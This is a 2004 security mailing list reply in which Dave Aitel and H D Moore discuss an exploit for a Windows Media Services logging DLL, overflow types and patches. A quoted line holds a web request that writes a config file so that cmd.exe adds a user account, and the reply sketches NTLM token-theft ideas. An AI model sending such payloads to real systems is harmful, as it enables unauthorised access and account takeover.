Dailydave mailing list archives

Re: New mediaservices sploit

From: Dave Aitel <dave () immunitysec com>
Date: Sat, 13 Mar 2004 14:22:53 -0500

H D Moore wrote:

| The code was posted to a few sites, it doesn't crash nor exploit
| any version of nsiislog.dll that I could find. Tested multiple
| variations on a stock Windows 2000 SP0 system without any real
| result. I am assuming that since its in CANVAS, it actually works
| on /something/, are there any special circumstances required to
| trigger it? Does the MS03-019 patch have to be installed for it be
| vulnerable to this MX_Stats overflow? It almost sounds like it is
| just another variation of the POST bug... is it also fixed by
| MS03-022?

Well, the POST bug was a heap overflow, and this bug is a stack
overflow, so I dunno. It works on my version of nsiislog.dll, which is
fairly old. It's been a while since I wrote it, so I don't remember
exactly what happened with the patch situation.

| Brett actually found three bugs in this ISAPI; the original chunked
|  encoding one, then the POST content overflow, and finally the one
| which was released by M$ last week. Does anyone have details on the
| latest vuln?

Last week? I think I must have missed it.

| Bonus points to anyone who can find a better way to exploit the
| unnamed bug^H^H^Hfeature below, without being dependent on an
| alternate web service or third-party software. The goal is instant
| command execution through writing a file to the system with
| arbitrary (even binary) contents. Writing to autoexec, startup, etc
| doesn't work since it requires user interaction. Assuming Windows
| 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work
| now that signatures are embedded (thanks Brett for info).
|
| GET

/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%
| | 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%
|  20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0
|
| -HD

You can't write a .asp file into the scripts directory? Or a .dll? I
assume not. You're running as SYSTEM? Why not write to \\myserver\\
and steal the token and relogin through NTLM auth?

- -dave